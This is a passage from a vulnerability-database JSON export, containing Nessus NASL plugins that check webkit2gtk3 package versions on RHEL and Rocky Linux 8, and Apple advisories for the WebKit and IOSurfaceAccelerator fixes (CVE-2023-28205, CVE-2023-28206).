{'reference':'webkit2gtk3-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'Rocky-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-debuginfo / webkit2gtk3-debugsource / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-08T13:32:57", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2023:3108 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-05-16T00:00:00", "type": "nessus", "title": "RHEL 8 : webkit2gtk3 (RHSA-2023:3108)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-29T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-devel", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc-devel"], "id": "REDHAT-RHSA-2023-3108.NASL", "href": "https://www.tenable.com/plugins/nessus/175873", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2023:3108. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(175873);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/29\");\n\n script_cve_id(\"CVE-2023-2203\");\n script_xref(name:\"RHSA\", value:\"2023:3108\");\n\n script_name(english:\"RHEL 8 : webkit2gtk3 (RHSA-2023:3108)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2023:3108 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free\n vulnerability. This flaw allows attackers with network access to pass specially crafted web content files,\n causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205\n security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux\n 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2023-2203\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2023:3108\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2188543\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2203\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel8/8/aarch64/appstream/debug',\n 'content/dist/rhel8/8/aarch64/appstream/os',\n 'content/dist/rhel8/8/aarch64/appstream/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/baseos/debug',\n 'content/dist/rhel8/8/aarch64/baseos/os',\n 'content/dist/rhel8/8/aarch64/baseos/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/codeready-builder/debug',\n 'content/dist/rhel8/8/aarch64/codeready-builder/os',\n 'content/dist/rhel8/8/aarch64/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/highavailability/debug',\n 'content/dist/rhel8/8/aarch64/highavailability/os',\n 'content/dist/rhel8/8/aarch64/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/supplementary/debug',\n 'content/dist/rhel8/8/aarch64/supplementary/os',\n 'content/dist/rhel8/8/aarch64/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/appstream/debug',\n 'content/dist/rhel8/8/ppc64le/appstream/os',\n 'content/dist/rhel8/8/ppc64le/appstream/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/baseos/debug',\n 'content/dist/rhel8/8/ppc64le/baseos/os',\n 'content/dist/rhel8/8/ppc64le/baseos/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/debug',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/os',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/highavailability/debug',\n 'content/dist/rhel8/8/ppc64le/highavailability/os',\n 'content/dist/rhel8/8/ppc64le/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/debug',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/os',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/debug',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/os',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/sap/debug',\n 'content/dist/rhel8/8/ppc64le/sap/os',\n 'content/dist/rhel8/8/ppc64le/sap/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/supplementary/debug',\n 'content/dist/rhel8/8/ppc64le/supplementary/os',\n 'content/dist/rhel8/8/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/s390x/appstream/debug',\n 'content/dist/rhel8/8/s390x/appstream/os',\n 'content/dist/rhel8/8/s390x/appstream/source/SRPMS',\n 'content/dist/rhel8/8/s390x/baseos/debug',\n 'content/dist/rhel8/8/s390x/baseos/os',\n 'content/dist/rhel8/8/s390x/baseos/source/SRPMS',\n 'content/dist/rhel8/8/s390x/codeready-builder/debug',\n 'content/dist/rhel8/8/s390x/codeready-builder/os',\n 'content/dist/rhel8/8/s390x/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/s390x/highavailability/debug',\n 'content/dist/rhel8/8/s390x/highavailability/os',\n 'content/dist/rhel8/8/s390x/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/s390x/resilientstorage/debug',\n 'content/dist/rhel8/8/s390x/resilientstorage/os',\n 'content/dist/rhel8/8/s390x/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/s390x/sap/debug',\n 'content/dist/rhel8/8/s390x/sap/os',\n 'content/dist/rhel8/8/s390x/sap/source/SRPMS',\n 'content/dist/rhel8/8/s390x/supplementary/debug',\n 'content/dist/rhel8/8/s390x/supplementary/os',\n 'content/dist/rhel8/8/s390x/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/appstream/debug',\n 'content/dist/rhel8/8/x86_64/appstream/os',\n 'content/dist/rhel8/8/x86_64/appstream/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/baseos/debug',\n 'content/dist/rhel8/8/x86_64/baseos/os',\n 'content/dist/rhel8/8/x86_64/baseos/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/codeready-builder/debug',\n 'content/dist/rhel8/8/x86_64/codeready-builder/os',\n 'content/dist/rhel8/8/x86_64/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/highavailability/debug',\n 'content/dist/rhel8/8/x86_64/highavailability/os',\n 'content/dist/rhel8/8/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/nfv/debug',\n 'content/dist/rhel8/8/x86_64/nfv/os',\n 'content/dist/rhel8/8/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/resilientstorage/debug',\n 'content/dist/rhel8/8/x86_64/resilientstorage/os',\n 'content/dist/rhel8/8/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/rt/debug',\n 'content/dist/rhel8/8/x86_64/rt/os',\n 'content/dist/rhel8/8/x86_64/rt/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap-solutions/debug',\n 'content/dist/rhel8/8/x86_64/sap-solutions/os',\n 'content/dist/rhel8/8/x86_64/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap/debug',\n 'content/dist/rhel8/8/x86_64/sap/os',\n 'content/dist/rhel8/8/x86_64/sap/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/supplementary/debug',\n 'content/dist/rhel8/8/x86_64/supplementary/os',\n 'content/dist/rhel8/8/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'webkit2gtk3-2.38.5-1.el8_8.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el8_8.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el8_8.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el8_8.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "apple": [{"lastseen": "2023-11-08T22:08:18", "description": "# About the security content of iOS 16.4.1 and iPadOS 16.4.1\n\nThis document describes the security content of iOS 16.4.1 and iPadOS 16.4.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## iOS 16.4.1 and iPadOS 16.4.1\n\nReleased April 7, 2023\n\n**IOSurfaceAccelerator**\n\nAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later\n\nImpact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2023-28206: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\n**WebKit**\n\nAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 254797\n\nCVE-2023-28205: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 31, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-07T00:00:00", "type": "apple", "title": "About the security content of iOS 16.4.1 and iPadOS 16.4.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-04-07T00:00:00", "id": "APPLE:99268A3B7560FFD18FBA01ACF4C3686D", "href": "https://support.apple.com/kb/HT213720", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T22:08:19", "description": "# About the security content of macOS Ventura 13.3.1\n\nThis document describes the security content of macOS Ventura 13.3.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## macOS Ventura 13.3.1\n\nReleased April 7, 2023\n\n**IOSurfaceAccelerator**\n\nAvailable for: macOS Ventura\n\nImpact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2023-28206: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\n**WebKit**\n\nAvailable for: macOS Ventura\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 254797\n\nCVE-2023-28205: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 31, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-07T00:00:00", "type": "apple", "title": "About the security content of macOS Ventura 13.3.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-04-07T00:00:00", "id": "APPLE:C0D7C1E42F184FC31F8109C2C5484099", "href": "https://support.apple.com/kb/HT213721", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T22:08:19", "description": "# About the security content of iOS 15.7.5 and iPadOS 15.7.5\n\nThis document describes the security content of iOS 15.7.5 and iPadOS 15.7.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## iOS 15.7.5 and iPadOS 15.7.5\n\nReleased April 10, 2023\n\n**IOSurfaceAccelerator**\n\nAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)\n\nImpact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2023-28206: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\n**WebKit**\n\nAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 254797\n\nCVE-2023-28205: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 27, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T00:00:00", "type": "apple", "title": "About the security content of iOS 15.7.5 and iPadOS 15.7.5", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 